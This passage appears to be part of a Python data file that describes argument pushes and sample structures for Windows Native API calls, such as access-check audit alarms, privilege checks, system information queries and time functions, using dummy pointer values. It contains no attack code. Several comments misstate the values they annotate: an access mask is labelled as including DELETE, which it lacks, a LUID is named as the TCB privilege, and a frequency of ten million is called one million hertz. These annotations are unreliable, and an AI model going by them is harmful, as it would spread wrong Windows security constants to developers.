receive TRUE/FALSE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"AccessGranted = TRUE\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ObjectCreation = FALSE\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00b0\",\r\n \"additionalComment\": \"Pointer to PRIVILEGE_SET (dummy pointer)\",\r\n \"structurePointer\": \"PRIVILEGE_SET\",\r\n \"structureRef\": \"struct253\",\r\n \"structureValueExpectations\": \"Privilege count and LUID_AND_ATTRIBUTES array.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00120089\",\r\n \"additionalComment\": \"GrantedAccess (SYNCHRONIZE | READ_CONTROL | DELETE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00120089\",\r\n \"additionalComment\": \"DesiredAccess (SYNCHRONIZE | READ_CONTROL | DELETE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000445\",\r\n \"additionalComment\": \"HANDLE ClientToken (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00c0\",\r\n \"additionalComment\": \"Pointer to SECURITY_DESCRIPTOR (dummy pointer)\",\r\n \"structurePointer\": \"SECURITY_DESCRIPTOR\",\r\n \"structureRef\": \"struct254\",\r\n \"structureValueExpectations\": \"Owner, group, DACL, SACL fields.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00d0\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING ObjectName (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct255\",\r\n \"structureValueExpectations\": \"Object name string.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00e0\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING ObjectTypeName (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct256\",\r\n \"structureValueExpectations\": \"Object type name string.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00f0\",\r\n \"additionalComment\": \"Pointer to HANDLE ObjectHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0100\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING SubsystemName (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct257\",\r\n \"structureValueExpectations\": \"Subsystem name string.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct253\": {\r\n \"type\": \"PRIVILEGE_SET\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"PrivilegeCount\",\r\n \"fieldType\": \"DWORD\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"One privilege\"\r\n },\r\n {\r\n \"fieldName\": \"Control\",\r\n \"fieldType\": \"DWORD\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"PRIVILEGE_SET_ALL_NECESSARY\"\r\n },\r\n {\r\n \"fieldName\": \"Privilege[0].Luid.LowPart\",\r\n \"fieldType\": \"DWORD\",\r\n \"fieldValue\": \"0x00000017\",\r\n \"fieldComment\": \"SE_TCB_PRIVILEGE (example)\"\r\n },\r\n {\r\n \"fieldName\": \"Privilege[0].Luid.HighPart\",\r\n \"fieldType\": \"LONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"High part of LUID\"\r\n },\r\n {\r\n \"fieldName\": \"Privilege[0].Attributes\",\r\n \"fieldType\": \"DWORD\",\r\n \"fieldValue\": \"0x00000002\",\r\n \"fieldComment\": \"SE_PRIVILEGE_ENABLED\"\r\n }\r\n ]\r\n },\r\n \"struct254\": {\r\n \"type\": \"SECURITY_DESCRIPTOR\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Revision\",\r\n \"fieldType\": \"UCHAR\",\r\n \"fieldValue\": \"0x01\",\r\n \"fieldComment\": \"SECURITY_DESCRIPTOR_REVISION\"\r\n },\r\n {\r\n \"fieldName\": \"Sbz1\",\r\n \"fieldType\": \"UCHAR\",\r\n \"fieldValue\": \"0x00\",\r\n \"fieldComment\": \"Reserved\"\r\n },\r\n {\r\n \"fieldName\": \"Control\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x8004\",\r\n \"fieldComment\": \"SE_DACL_PRESENT | SE_SELF_RELATIVE\"\r\n },\r\n {\r\n \"fieldName\": \"Owner\",\r\n \"fieldType\": \"PSID\",\r\n \"fieldValue\": \"0xbadd01b0\",\r\n \"fieldComment\": \"Pointer to SID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Group\",\r\n \"fieldType\": \"PSID\",\r\n \"fieldValue\": \"0xbadd01c0\",\r\n \"fieldComment\": \"Pointer to SID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Sacl\",\r\n \"fieldType\": \"PACL\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"Dacl\",\r\n \"fieldType\": \"PACL\",\r\n \"fieldValue\": \"0xbadd01d0\",\r\n \"fieldComment\": \"Pointer to ACL (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct255\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0010\",\r\n \"fieldComment\": \"16 bytes (8 UTF-16 chars)\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"32 bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd01e0\",\r\n \"fieldComment\": \"Pointer to object name string (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct256\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0012\",\r\n \"fieldComment\": \"18 bytes (9 UTF-16 chars)\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"32 bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd01f0\",\r\n \"fieldComment\": \"Pointer to object type name string (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct257\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0014\",\r\n \"fieldComment\": \"20 bytes (10 UTF-16 chars)\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"32 bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0200\",\r\n \"fieldComment\": \"Pointer to subsystem name string (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtPrivilegeObjectAuditAlarm\": {\r\n \"ntFunc\": \"NtPrivilegeObjectAuditAlarm\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"AccessGranted = TRUE\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0110\",\r\n \"additionalComment\": \"Pointer to PRIVILEGE_SET ClientPrivileges (dummy pointer)\",\r\n \"structurePointer\": \"PRIVILEGE_SET\",\r\n \"structureRef\": \"struct258\",\r\n \"structureValueExpectations\": \"Privilege count and LUID_AND_ATTRIBUTES array.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00120089\",\r\n \"additionalComment\": \"DesiredAccess (SYNCHRONIZE | READ_CONTROL | DELETE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000445\",\r\n \"additionalComment\": \"HANDLE ClientToken (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ObjectHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0120\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING SubsystemName (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct259\",\r\n \"structureValueExpectations\": \"Subsystem name string.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct258\": {\r\n \"type\": \"PRIVILEGE_SET\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"PrivilegeCount\",\r\n \"fieldType\": \"DWORD\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"One privilege\"\r\n },\r\n {\r\n \"fieldName\": \"Control\",\r\n \"fieldType\": \"DWORD\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"PRIVILEGE_SET_ALL_NECESSARY\"\r\n },\r\n {\r\n \"fieldName\": \"Privilege[0].Luid.LowPart\",\r\n \"fieldType\": \"DWORD\",\r\n \"fieldValue\": \"0x00000017\",\r\n \"fieldComment\": \"SE_TCB_PRIVILEGE (example)\"\r\n },\r\n {\r\n \"fieldName\": \"Privilege[0].Luid.HighPart\",\r\n \"fieldType\": \"LONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"High part of LUID\"\r\n },\r\n {\r\n \"fieldName\": \"Privilege[0].Attributes\",\r\n \"fieldType\": \"DWORD\",\r\n \"fieldValue\": \"0x00000002\",\r\n \"fieldComment\": \"SE_PRIVILEGE_ENABLED\"\r\n }\r\n ]\r\n },\r\n \"struct259\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0014\",\r\n \"fieldComment\": \"20 bytes (10 UTF-16 chars)\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"32 bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0210\",\r\n \"fieldComment\": \"Pointer to subsystem name string (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtPrivilegedServiceAuditAlarm\": {\r\n \"ntFunc\": \"NtPrivilegedServiceAuditAlarm\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"AccessGranted = FALSE\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ClientPrivileges = None (no privileges specified)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ClientToken = None (no client token)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ServiceName = None (no service name)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"SubsystemName = None (no subsystem name)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtAccessCheck\": {\r\n \"ntFunc\": \"NtAccessCheck\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"AccessStatus = None (no status output)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"GrantedAccess = None (no granted access output)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"BufferLength = None (no buffer length output)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"RequiredPrivilegesBuffer = None (no privileges buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"GenericMapping = None (no generic mapping provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"DesiredAccess = 0x00000000 (no access requested)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ClientToken = None (no client token)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"SecurityDescriptor = None (no security descriptor)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtAllocateLocallyUniqueId\": {\r\n \"ntFunc\": \"NtAllocateLocallyUniqueId\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"LocallyUniqueId = None (no output buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtAllocateUuids\": {\r\n \"ntFunc\": \"NtAllocateUuids\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Sequence = None (no output buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Range = None (no output buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Time = None (no output buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtPrivilegeCheck\": {\r\n \"ntFunc\": \"NtPrivilegeCheck\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Result = None (no output buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"RequiredPrivileges = None (no privileges specified)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ClientToken = None (no client token)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQuerySystemInformation\": {\r\n \"ntFunc\": \"NtQuerySystemInformation\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG ReturnLength (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00001000\"\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"SystemInformationLength (4096 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to buffer for SystemInformation (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd0020\"\r\n },\r\n {\r\n \"value\": \"0x00000005\",\r\n \"additionalComment\": \"SystemInformationClass (SystemProcessInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetSystemInformation\": {\r\n \"ntFunc\": \"NtSetSystemInformation\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"SystemInformationLength (16 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to buffer for SystemInformation (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd0040\"\r\n },\r\n {\r\n \"value\": \"0x00000011\",\r\n \"additionalComment\": \"SystemInformationClass (SystemTimeAdjustmentInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtGetTickCount\": {\r\n \"ntFunc\": \"NtGetTickCount\",\r\n \"pushes\": [],\r\n \"structures\": {}\r\n },\r\n \"NtQueryPerformanceCounter\": {\r\n \"ntFunc\": \"NtQueryPerformanceCounter\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER PerformanceFrequency (dummy pointer)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct260\",\r\n \"structureValueExpectations\": \"Frequency of the high-resolution performance counter.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER PerformanceCounter (dummy pointer)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct261\",\r\n \"structureValueExpectations\": \"Current value of the high-resolution performance counter.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct260\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x989680\",\r\n \"fieldComment\": \"Performance frequency (1,000,000 Hz typical)\"\r\n }\r\n ]\r\n },\r\n \"struct261\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x123456789ABCDEF0\",\r\n \"fieldComment\": \"Sample performance counter value\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtQuerySystemTime\": {\r\n \"ntFunc\": \"NtQuerySystemTime\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER SystemTime (dummy pointer)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct262\",\r\n \"structureValueExpectations\": \"Current system time as a 64-bit value (100-nanosecond intervals since Jan 1, 1601 UTC).\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct262\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x01D9F1E2B3C4D5E6\",\r\n \"fieldComment\": \"Sample system time value\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtQueryTimerResolution\": {\r\n \"ntFunc\": \"NtQueryTimerResolution\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG CurrentResolution (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x000003E8\"\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to ULONG MaximumResolution (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00002710\"\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to ULONG MinimumResolution (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000064\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetSystemTime\": {\r\n \"ntFunc\": \"NtSetSystemTime\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER PreviousTime (dummy pointer)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct263\",\r\n \"structureValueExpectations\": \"Previous system time value (optional, can be None).\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER SystemTime (dummy pointer)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct264\",\r\n \"structureValueExpectations\": \"New system time value to set.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct263\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x0000000000000000\",\r\n \"fieldComment\": \"Previous system time (None/unused in this example)\"\r\n }\r\n ]\r\n },\r\n \"struct264\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x01D9A5B1C0000000\",\r\n \"fieldComment\": \"New system time (FILETIME format, e.g., 2024-06-01 00:00:00 UTC)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtSetTimerResolution\": {\r\n \"ntFunc\": \"NtSetTimerResolution\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to ULONG CurrentResolution (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x000003E8\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN SetResolution (TRUE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x000003E8\",\r\n \"additionalComment\": \"ULONG DesiredResolution (1000, in 100-ns units)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlTimeFieldsToTime\": {\r\n \"ntFunc\": \"RtlTimeFieldsToTime\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER Time (dummy pointer)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct265\",\r\n \"structureValueExpectations\": \"Receives the converted time value.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to TIME_FIELDS (dummy pointer)\",\r\n \"structurePointer\": \"TIME_FIELDS\",\r\n \"structureRef\": \"struct266\",\r\n \"structureValueExpectations\": \"Fields representing date and time.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct265\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x0000000000000000\",\r\n \"fieldComment\": \"Receives the converted time value\"\r\n }\r\n ]\r\n },\r\n \"struct266\": {\r\n \"type\": \"TIME_FIELDS\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Year\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x07E8\",\r\n \"fieldComment\": \"2024\"\r\n },\r\n {\r\n \"fieldName\": \"Month\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x06\",\r\n \"fieldComment\": \"June\"\r\n },\r\n {\r\n \"fieldName\": \"Day\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x01\",\r\n \"fieldComment\": \"1st\"\r\n },\r\n {\r\n \"fieldName\": \"Hour\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x00\",\r\n \"fieldComment\": \"Midnight\"\r\n },\r\n {\r\n \"fieldName\": \"Minute\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x00\",\r\n \"fieldComment\": \"00\"\r\n },\r\n {\r\n \"fieldName\": \"Second\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x00\",\r\n \"fieldComment\": \"00\"\r\n },\r\n {\r\n \"fieldName\": \"Milliseconds\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0000\",\r\n \"fieldComment\": \"0\"\r\n },\r\n {\r\n \"fieldName\": \"Weekday\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x06\",\r\n \"fieldComment\": \"Saturday\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"RtlTimeToTimeFields\": {\r\n \"ntFunc\": \"RtlTimeToTimeFields\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to TIME_FIELDS (dummy pointer)\",\r\n \"structurePointer\": \"TIME_FIELDS\",\r\n \"structureRef\": \"struct267\",\r\n \"structureValueExpectations\": \"Receives the broken-down time fields.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER Time (dummy pointer)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct268\",\r\n \"structureValueExpectations\": \"Time value to convert.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct267\": {\r\n \"type\": \"TIME_FIELDS\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Year\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x07E8\",\r\n \"fieldComment\": \"2024\"\r\n },\r\n {\r\n \"fieldName\": \"Month\",\r\n \"fieldType\": 